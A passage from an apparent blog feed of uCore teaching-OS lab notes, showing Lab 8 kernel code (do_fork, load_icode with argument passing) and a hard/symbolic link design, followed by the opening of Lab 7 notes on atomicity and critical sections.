class="keyword">if</span> ((proc = <span class="built_in">alloc_proc</span>()) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> fork_out;</span><br><span class="line">    &#125;</span><br><span class="line">    proc-&gt;parent = current;</span><br><span class="line">    <span class="built_in">assert</span>(current-&gt;wait_state == <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">setup_kstack</span>(proc) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_proc;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//LAB8:EXERCISE2 YOUR CODE  HINT:how to copy the fs in parent&#x27;s proc_struct?</span></span><br><span class="line">    <span class="comment">// LAB8: copy the current process&#x27;s fs into the forked process</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">copy_files</span>(clone_flags, proc) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_kstack;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">copy_mm</span>(clone_flags, proc) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_fs;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">copy_thread</span>(proc, stack, tf);</span><br><span class="line"></span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        proc-&gt;pid = <span 
class="built_in">get_pid</span>();</span><br><span class="line">        <span class="built_in">hash_proc</span>(proc);</span><br><span class="line">        <span class="built_in">set_links</span>(proc);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">wakeup_proc</span>(proc);</span><br><span class="line"></span><br><span class="line">    ret = proc-&gt;pid;</span><br><span class="line">fork_out:</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">  <span class="comment">// LAB8: if a copy step fails, undo the work done so far</span></span><br><span class="line">bad_fork_cleanup_fs:  <span class="comment">//for LAB8</span></span><br><span class="line">    <span class="built_in">put_files</span>(proc);</span><br><span class="line">bad_fork_cleanup_kstack:</span><br><span class="line">    <span class="built_in">put_kstack</span>(proc);</span><br><span class="line">bad_fork_cleanup_proc:</span><br><span class="line">    <span class="built_in">kfree</span>(proc);</span><br><span class="line">    <span class="keyword">goto</span> fork_out;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>The <code>load_icode</code> function can be adapted from the lab7 version; it does not need to be written from scratch.</p><ul><li><p>In the lab7 source, the executable is read directly from memory, whereas here <code>load_icode_read</code> must be used to read the <code>ELF header</code> and the data of each segment from the file system.</p></li><li><p>The lab7 version of <code>load_icode</code> does not pass arguments to the program run by <code>execve</code>; lab8 has to add this.</p></li><li><p>The completed source is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span 
class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span 
class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span 
class="line">192</span><br><span class="line">193</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// load_icode -  called by sys_exec--&gt;do_execve</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">load_icode</span><span class="params">(<span class="type">int</span> fd, <span class="type">int</span> argc, <span class="type">char</span> **kargv)</span> </span>&#123;</span><br><span class="line">    <span class="comment">/* LAB8:EXERCISE2 YOUR CODE  HINT:how to load the file with handler fd  in to process&#x27;s memory? how to setup argc/argv?</span></span><br><span class="line"><span class="comment">     * MACROs or Functions:</span></span><br><span class="line"><span class="comment">     *  mm_create        - create a mm</span></span><br><span class="line"><span class="comment">     *  setup_pgdir      - setup pgdir in mm</span></span><br><span class="line"><span class="comment">     *  load_icode_read  - read raw data content of program file</span></span><br><span class="line"><span class="comment">     *  mm_map           - build new vma</span></span><br><span class="line"><span class="comment">     *  pgdir_alloc_page - allocate new memory for  TEXT/DATA/BSS/stack parts</span></span><br><span class="line"><span class="comment">     *  lcr3             - update Page Directory Addr Register -- CR3</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">  <span class="comment">/* (1) create a new mm for current process</span></span><br><span class="line"><span class="comment">     * (2) create a new PDT, and mm-&gt;pgdir= kernel virtual addr of PDT</span></span><br><span class="line"><span class="comment">     * (3) copy TEXT/DATA/BSS parts in binary to memory space of process</span></span><br><span 
class="line"><span class="comment">     *    (3.1) read raw data content in file and resolve elfhdr</span></span><br><span class="line"><span class="comment">     *    (3.2) read raw data content in file and resolve proghdr based on info in elfhdr</span></span><br><span class="line"><span class="comment">     *    (3.3) call mm_map to build vma related to TEXT/DATA</span></span><br><span class="line"><span class="comment">     *    (3.4) callpgdir_alloc_page to allocate page for TEXT/DATA, read contents in file</span></span><br><span class="line"><span class="comment">     *          and copy them into the new allocated pages</span></span><br><span class="line"><span class="comment">     *    (3.5) callpgdir_alloc_page to allocate pages for BSS, memset zero in these pages</span></span><br><span class="line"><span class="comment">     * (4) call mm_map to setup user stack, and put parameters into user stack</span></span><br><span class="line"><span class="comment">     * (5) setup current process&#x27;s mm, cr3, reset pgidr (using lcr3 MARCO)</span></span><br><span class="line"><span class="comment">     * (6) setup uargc and uargv in user stacks</span></span><br><span class="line"><span class="comment">     * (7) setup trapframe for user environment</span></span><br><span class="line"><span class="comment">     * (8) if up steps failed, you should cleanup the env.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="built_in">assert</span>(argc &gt;= <span class="number">0</span> &amp;&amp; argc &lt;= EXEC_MAX_ARG_NUM);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (current-&gt;mm != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">panic</span>(<span class="string">&quot;load_icode: current-&gt;mm must be empty.\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span 
class="line"></span><br><span class="line">    <span class="type">int</span> ret = -E_NO_MEM;</span><br><span class="line">    <span class="comment">// create the memory-management structure for the process</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mm_struct</span> *mm;</span><br><span class="line">    <span class="keyword">if</span> ((mm = <span class="built_in">mm_create</span>()) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> bad_mm;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">setup_pgdir</span>(mm) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> bad_pgdir_cleanup_mm;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">Page</span> *page;</span><br><span class="line">    <span class="comment">// LAB8: read the ELF header from the file, not from memory as in Lab7</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">elfhdr</span> __elf, *elf = &amp;__elf;</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">load_icode_read</span>(fd, elf, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> elfhdr), <span class="number">0</span>)) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> bad_elf_cleanup_pgdir;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// check that the ELF header just read is valid</span></span><br><span class="line">    <span class="keyword">if</span> (elf-&gt;e_magic != ELF_MAGIC) &#123;</span><br><span class="line">        ret = -E_INVAL_ELF;</span><br><span class="line">        <span class="keyword">goto</span> 
bad_elf_cleanup_pgdir;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// allocate memory for each segment according to its size and base address</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proghdr</span> __ph, *ph = &amp;__ph;</span><br><span class="line">    <span class="type">uint32_t</span> vm_flags, perm, phnum;</span><br><span class="line">    <span class="keyword">for</span> (phnum = <span class="number">0</span>; phnum &lt; elf-&gt;e_phnum; phnum ++) &#123;</span><br><span class="line">        <span class="comment">// LAB8: read each program header (size, base address, etc.) from its offset in the file</span></span><br><span class="line">        <span class="type">off_t</span> phoff = elf-&gt;e_phoff + <span class="built_in">sizeof</span>(<span class="keyword">struct</span> proghdr) * phnum;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">load_icode_read</span>(fd, ph, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> proghdr), phoff)) != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">goto</span> bad_cleanup_mmap;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (ph-&gt;p_type != ELF_PT_LOAD) &#123;</span><br><span class="line">            <span class="keyword">continue</span> ;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (ph-&gt;p_filesz &gt; ph-&gt;p_memsz) &#123;</span><br><span class="line">            ret = -E_INVAL_ELF;</span><br><span class="line">            <span class="keyword">goto</span> bad_cleanup_mmap;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (ph-&gt;p_filesz == <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">continue</span> ;</span><br><span class="line"> 
       &#125;</span><br><span class="line">        vm_flags = <span class="number">0</span>, perm = PTE_U;</span><br><span class="line">        <span class="keyword">if</span> (ph-&gt;p_flags &amp; ELF_PF_X) vm_flags |= VM_EXEC;</span><br><span class="line">        <span class="keyword">if</span> (ph-&gt;p_flags &amp; ELF_PF_W) vm_flags |= VM_WRITE;</span><br><span class="line">        <span class="keyword">if</span> (ph-&gt;p_flags &amp; ELF_PF_R) vm_flags |= VM_READ;</span><br><span class="line">        <span class="keyword">if</span> (vm_flags &amp; VM_WRITE) perm |= PTE_W;</span><br><span class="line">        <span class="comment">// set up the address space for the current segment</span></span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">mm_map</span>(mm, ph-&gt;p_va, ph-&gt;p_memsz, vm_flags, <span class="literal">NULL</span>)) != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">goto</span> bad_cleanup_mmap;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="type">off_t</span> offset = ph-&gt;p_offset;</span><br><span class="line">        <span class="type">size_t</span> off, size;</span><br><span class="line">        <span class="type">uintptr_t</span> start = ph-&gt;p_va, end, la = <span class="built_in">ROUNDDOWN</span>(start, PGSIZE);</span><br><span class="line"></span><br><span class="line">        ret = -E_NO_MEM;</span><br><span class="line"></span><br><span class="line">        end = ph-&gt;p_va + ph-&gt;p_filesz;</span><br><span class="line">        <span class="keyword">while</span> (start &lt; end) &#123;</span><br><span class="line">            <span class="comment">// allocate a page and set up its page table entry</span></span><br><span class="line">            <span class="keyword">if</span> ((page = <span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, la, perm)) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">                ret = 
-E_NO_MEM;</span><br><span class="line">                <span class="keyword">goto</span> bad_cleanup_mmap;</span><br><span class="line">            &#125;</span><br><span class="line">            off = start - la, size = PGSIZE - off, la += PGSIZE;</span><br><span class="line">            <span class="keyword">if</span> (end &lt; la) &#123;</span><br><span class="line">                size -= la - end;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// LAB8: read the segment data from the ELF file into this memory</span></span><br><span class="line">            <span class="keyword">if</span> ((ret = <span class="built_in">load_icode_read</span>(fd, <span class="built_in">page2kva</span>(page) + off, size, offset)) != <span class="number">0</span>) &#123;</span><br><span class="line">                <span class="keyword">goto</span> bad_cleanup_mmap;</span><br><span class="line">            &#125;</span><br><span class="line">            start += size, offset += size;</span><br><span class="line">        &#125;</span><br><span class="line">        end = ph-&gt;p_va + ph-&gt;p_memsz;</span><br><span class="line">        <span class="comment">// zero the rest of the current page (the space left after copying the ELF data)</span></span><br><span class="line">        <span class="keyword">if</span> (start &lt; la) &#123;</span><br><span class="line">            <span class="comment">/* ph-&gt;p_memsz == ph-&gt;p_filesz */</span></span><br><span class="line">            <span class="keyword">if</span> (start == end) &#123;</span><br><span class="line">                <span class="keyword">continue</span> ;</span><br><span class="line">            &#125;</span><br><span class="line">            off = start + PGSIZE - la, size = PGSIZE - off;</span><br><span class="line">            <span class="keyword">if</span> (end &lt; la) &#123;</span><br><span class="line">                size -= la - end;</span><br><span class="line">            &#125;</span><br><span class="line">            
<span class="built_in">memset</span>(<span class="built_in">page2kva</span>(page) + off, <span class="number">0</span>, size);</span><br><span class="line">            start += size;</span><br><span class="line">            <span class="built_in">assert</span>((end &lt; la &amp;&amp; start == end) || (end &gt;= la &amp;&amp; start == la));</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// zero the remaining pages of the segment (pages beyond the copied ELF data)</span></span><br><span class="line">        <span class="keyword">while</span> (start &lt; end) &#123;</span><br><span class="line">            <span class="keyword">if</span> ((page = <span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, la, perm)) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">                ret = -E_NO_MEM;</span><br><span class="line">                <span class="keyword">goto</span> bad_cleanup_mmap;</span><br><span class="line">            &#125;</span><br><span class="line">            off = start - la, size = PGSIZE - off, la += PGSIZE;</span><br><span class="line">            <span class="keyword">if</span> (end &lt; la) &#123;</span><br><span class="line">                size -= la - end;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="built_in">memset</span>(<span class="built_in">page2kva</span>(page) + off, <span class="number">0</span>, size);</span><br><span class="line">            start += size;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// close the ELF file</span></span><br><span class="line">    <span class="built_in">sysfile_close</span>(fd);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// set up the user stack</span></span><br><span class="line">    vm_flags = VM_READ | VM_WRITE | VM_STACK;</span><br><span class="line">    <span class="keyword">if</span> ((ret 
= <span class="built_in">mm_map</span>(mm, USTACKTOP - USTACKSIZE, USTACKSIZE, vm_flags, <span class="literal">NULL</span>)) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> bad_cleanup_mmap;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, USTACKTOP-PGSIZE , PTE_USER) != <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, USTACKTOP<span class="number">-2</span>*PGSIZE , PTE_USER) != <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, USTACKTOP<span class="number">-3</span>*PGSIZE , PTE_USER) != <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, USTACKTOP<span class="number">-4</span>*PGSIZE , PTE_USER) != <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">mm_count_inc</span>(mm);</span><br><span class="line">    <span class="comment">// load the page directory into CR3</span></span><br><span class="line">    current-&gt;mm = mm;</span><br><span class="line">    current-&gt;cr3 = <span class="built_in">PADDR</span>(mm-&gt;pgdir);</span><br><span class="line">    <span class="built_in">lcr3</span>(<span class="built_in">PADDR</span>(mm-&gt;pgdir));</span><br><span class="line"></span><br><span class="line">    <span class="comment">//setup argc, argv</span></span><br><span class="line">    <span class="comment">// LAB8: set up the arguments of the program started by execve</span></span><br><span class="line">    <span class="type">uint32_t</span> argv_size=<span class="number">0</span>, i;</span><br><span class="line">    <span 
class="keyword">for</span> (i = <span class="number">0</span>; i &lt; argc; i ++) &#123;</span><br><span class="line">        argv_size += <span class="built_in">strnlen</span>(kargv[i],EXEC_MAX_ARG_LEN + <span class="number">1</span>)<span class="number">+1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">uintptr_t</span> stacktop = USTACKTOP - (argv_size/<span class="built_in">sizeof</span>(<span class="type">long</span>)<span class="number">+1</span>)*<span class="built_in">sizeof</span>(<span class="type">long</span>);</span><br><span class="line">    <span class="comment">// place the arguments directly at the bottom of the new stack</span></span><br><span class="line">    <span class="type">char</span>** uargv=(<span class="type">char</span> **)(stacktop  - argc * <span class="built_in">sizeof</span>(<span class="type">char</span> *));</span><br><span class="line"></span><br><span class="line">    argv_size = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; argc; i ++) &#123;</span><br><span class="line">        uargv[i] = <span class="built_in">strcpy</span>((<span class="type">char</span> *)(stacktop + argv_size ), kargv[i]);</span><br><span class="line">        argv_size +=  <span class="built_in">strnlen</span>(kargv[i],EXEC_MAX_ARG_LEN + <span class="number">1</span>)<span class="number">+1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    stacktop = (<span class="type">uintptr_t</span>)uargv - <span class="built_in">sizeof</span>(<span class="type">int</span>);</span><br><span class="line">    *(<span class="type">int</span> *)stacktop = argc;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">trapframe</span> *tf = current-&gt;tf;</span><br><span class="line">    <span 
class="built_in">memset</span>(tf, <span class="number">0</span>, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe));</span><br><span class="line">    tf-&gt;tf_cs = USER_CS;</span><br><span class="line">    tf-&gt;tf_ds = tf-&gt;tf_es = tf-&gt;tf_ss = USER_DS;</span><br><span class="line">    tf-&gt;tf_esp = stacktop;</span><br><span class="line">    tf-&gt;tf_eip = elf-&gt;e_entry;</span><br><span class="line">    tf-&gt;tf_eflags = FL_IF;</span><br><span class="line">    ret = <span class="number">0</span>;</span><br><span class="line">out:</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">bad_cleanup_mmap:</span><br><span class="line">    <span class="built_in">exit_mmap</span>(mm);</span><br><span class="line">bad_elf_cleanup_pgdir:</span><br><span class="line">    <span class="built_in">put_pgdir</span>(mm);</span><br><span class="line">bad_pgdir_cleanup_mm:</span><br><span class="line">    <span class="built_in">mm_destroy</span>(mm);</span><br><span class="line">bad_mm:</span><br><span class="line">    <span class="keyword">goto</span> out;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li></ul><blockquote><p>Outline a design for implementing <strong>UNIX hard links and symbolic links</strong>.</p></blockquote><ul><li><p>SFS already reserves the declarations for hard and symbolic links (they are not implemented):</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * VFS layer high-level operations on pathnames</span></span><br><span 
class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_link         - Create a hard link to a file.</span></span><br><span class="line"><span class="comment"> *    vfs_symlink      - Create a symlink PATH containing contents CONTENTS.</span></span><br><span class="line"><span class="comment"> *    vfs_unlink       - Delete a file/directory.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_link</span><span class="params">(<span class="type">char</span> *old_path, <span class="type">char</span> *new_path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_symlink</span><span class="params">(<span class="type">char</span> *old_path, <span class="type">char</span> *new_path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_unlink</span><span class="params">(<span class="type">char</span> *path)</span></span>;</span><br></pre></td></tr></table></figure></li><li><p>Implementing hard links</p><ul><li>To create a hard link, still create an <code>sfs_disk_entry</code> for <code>new_path</code>, but point its <code>ino</code> member at the on-disk inode of <code>old_path</code> and increment that inode's <code>nlinks</code> reference count.</li><li>To delete a hard link, decrement <code>nlinks</code> in the corresponding <code>sfs_disk_inode</code> and remove the link's <code>sfs_disk_entry</code>. The inode itself can be reclaimed once <code>nlinks</code> drops to zero.</li></ul></li><li><p>Implementing symbolic links</p><ul><li><p>Unlike a hard link, creating a symbolic link also creates a new <code>sfs_disk_inode</code> (that is, a brand-new file). <code>old_path</code> is then written into that file, and the <code>type</code> of the <code>sfs_disk_inode</code> is set to <code>SFS_TYPE_LINK</code>.</p></li><li><p>Deleting a symbolic link is no different from deleting a file: remove the corresponding <code>sfs_disk_entry</code> and <code>sfs_disk_inode</code>.</p></li></ul></li></ul>]]></content>
    
    
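    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;These are notes I wrote while completing &lt;code&gt;uCore&lt;/code&gt; Lab 8.&lt;/li&gt;
&lt;li&gt;They cover parts of the implementation of the file system and the I/O subsystem.&lt;/li&gt;
&lt;li&gt;The post is very long; using the navigation sidebar on the right is recommended.&lt;/li&gt;
&lt;/ul&gt;</summary>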
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>uCore Labs - Lab7</title>
    <link href="https://kiprey.github.io/2020/09/uCore-7/"/>
    <id>https://kiprey.github.io/2020/09/uCore-7/</id>
    <published>2020-09-21T09:35:38.000Z</published>
    <updated>2025-11-24T03:59:40.153Z</updated>
    
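    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><ul><li>These are notes I wrote while completing <code>uCore</code> Lab 7.</li><li>They cover the implementation of semaphores, monitors, deadlock, and inter-process communication.</li></ul><span id="more"></span><h2 id="知识点">Key Concepts</h2><h3 id="1-原子操作（Atomic-Operator）">1. Atomic Operation</h3><ul><li><p>An atomic operation is one that cannot be interrupted or fail partway through.</p></li><li><p>It has only two possible outcomes:</p><ul><li>the operation <strong>completes successfully</strong></li><li>the operation <strong>does not execute at all</strong></li></ul><blockquote><p>It is <strong>never</strong> the case that the operation is <strong>partially executed</strong>.</p></blockquote><ul><li>The operating system must use synchronization mechanisms to guarantee that certain operations are atomic even under concurrent execution.</li></ul></li></ul><h3 id="2-进程的交互关系">2. Interaction Between Processes</h3><hr><table><thead><tr><th style="text-align:center">Degree of awareness</th><th style="text-align:center">Relationship</th><th style="text-align:center">Influence between processes</th></tr></thead><tbody><tr><td style="text-align:center">Unaware of each other (no knowledge that other processes exist)</td><td style="text-align:center">Independent</td><td style="text-align:center">One process's operations do not affect the results of other processes</td></tr><tr><td style="text-align:center">Indirectly aware (both interact with a third party, e.g. shared data)</td><td style="text-align:center">Cooperation by sharing</td><td style="text-align:center">A process's result depends on the state of the shared resource</td></tr><tr><td style="text-align:center">Directly aware (the two interact directly, e.g. by communication)</td><td style="text-align:center">Cooperation by communication</td><td style="text-align:center">A process's result depends on information obtained from other processes</td></tr></tbody></table><p>Three situations can arise between processes:</p><ul><li>Mutual exclusion: while one process holds a resource, <strong>no other process can use it</strong></li><li>Deadlock: several processes each hold part of the resources and form a <strong>circular wait</strong></li><li>Starvation: other processes may take turns holding the resource while one process <strong>never obtains it</strong></li></ul><h3 id="3-临界区">3. Critical Sections</h3><h4 id="a-相关区域的概念">a. Related Sections</h4><ul><li>Critical section: a piece of code in a process that accesses a critical resource and must execute under mutual exclusion.</li><li>Entry section: code that checks whether the critical section may be entered and, if so, sets an “<strong>in critical section</strong>” flag.</li><li>Exit section: clears the flag.</li><li>Remainder section: the rest of the code.</li></ul><h4 id="b-临界区的访问规则">b. Rules for Accessing a Critical Section</h4><p>Enter if free, wait if busy, bounded waiting, and yield while waiting (optional).</p><blockquote><p>Yield while waiting: a process that cannot enter the critical section temporarily gives up the CPU.</p></blockquote><h4 id="c-临界区的实现方法">c. 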
Implementing Critical Sections</h4><h5 id="1-禁用中断">1) Disabling Interrupts</h5><ul><li><p>No interrupts means no context switches, and therefore no concurrency.</p><ul><li><p>The hardware defers interrupt handling until interrupts are re-enabled.</p></li><li><p>Modern computer architectures provide instructions for disabling interrupts.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">local_irq_save</span>(<span class="type">unsigned</span> <span class="type">long</span> flags);</span><br><span class="line"><span class="function">critical_section</span></span><br><span class="line"><span class="function"><span class="title">local_irq_restore</span><span class="params">(<span class="type">unsigned</span> <span class="type">long</span> flags)</span></span>;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>Entering the critical section: disable all interrupts and save the flags.</p></li><li><p>Leaving the critical section: re-enable interrupts and restore the flags.</p></li><li><p>Drawbacks</p><ul><li><p>Once interrupts are disabled, <strong>the process cannot be stopped</strong></p><ul><li>The whole system stalls as a result</li><li>Other processes may starve</li></ul></li><li><p>The critical section may be long, so <strong>the time needed to respond to an interrupt is unpredictable</strong></p></li><li><p>Works on a <strong>single processor</strong> only</p></li></ul></li></ul><h5 id="2-基于软件的同步解决方法">2) Software-Based Synchronization</h5><p><strong>Threads can synchronize their behavior through shared variables</strong>.</p><ul><li><p>Peterson's algorithm (a mutual-exclusion algorithm for two threads)</p><ul><li><p>Shared variables</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span 